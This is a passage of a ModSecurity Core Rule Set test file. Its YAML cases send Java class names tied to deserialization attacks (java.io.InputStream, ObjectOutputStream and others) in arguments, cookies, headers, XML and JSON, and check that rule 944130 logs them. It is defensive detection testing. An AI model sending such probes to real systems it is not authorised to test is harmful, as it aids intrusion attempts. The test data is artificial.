log_contains: "id \"944130\"" - test_title: 944130-136 desc: "Request header test includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.FilterReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-137 desc: "XML attribute value includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-138 desc: "XML element value includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterReader" output: log_contains: "id \"944130\"" - test_title: 944130-139 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.FilterReader" output: log_contains: "id \"944130\"" - test_title: 944130-140 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.FilterReader" output: log_contains: "id \"944130\"" - test_title: 944130-141 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-142 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.FilterReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-143 desc: "Argument test includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.InputStream" output: log_contains: "id \"944130\"" - test_title: 944130-144 desc: "Argument name includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.InputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-145 desc: "Cookie test includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.InputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-146 desc: "Cookie name includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.InputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-147 desc: "Request header test includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.InputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-148 desc: "XML attribute value includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-149 desc: "XML element value includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.InputStream" output: log_contains: "id \"944130\"" - test_title: 944130-150 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.InputStream" output: log_contains: "id \"944130\"" - test_title: 944130-151 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.InputStream" output: log_contains: "id \"944130\"" - test_title: 944130-152 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.InputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-153 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.InputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-154 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.InputStreamReader" output: log_contains: "id \"944130\"" - test_title: 944130-155 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.InputStreamReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-156 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.InputStreamReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-157 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.InputStreamReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-158 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.InputStreamReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-159 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-160 desc: "XML element value includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.InputStreamReader" output: log_contains: "id \"944130\"" - test_title: 944130-161 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.InputStreamReader" output: log_contains: "id \"944130\"" - test_title: 944130-162 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.InputStreamReader" output: log_contains: "id \"944130\"" - test_title: 944130-163 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.InputStreamReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-164 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.InputStreamReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-165 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.LineNumberReader" output: log_contains: "id \"944130\"" - test_title: 944130-166 desc: "Argument name includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.LineNumberReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-167 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.LineNumberReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-168 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.LineNumberReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-169 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.LineNumberReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-170 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-171 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.LineNumberReader" output: log_contains: "id \"944130\"" - test_title: 944130-172 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.LineNumberReader" output: log_contains: "id \"944130\"" - test_title: 944130-173 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.LineNumberReader" output: log_contains: "id \"944130\"" - test_title: 944130-174 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.LineNumberReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-175 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.LineNumberReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-176 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-177 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.ObjectOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-178 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.ObjectOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-179 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.ObjectOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-180 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.ObjectOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-181 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-182 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-183 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-184 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-185 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" 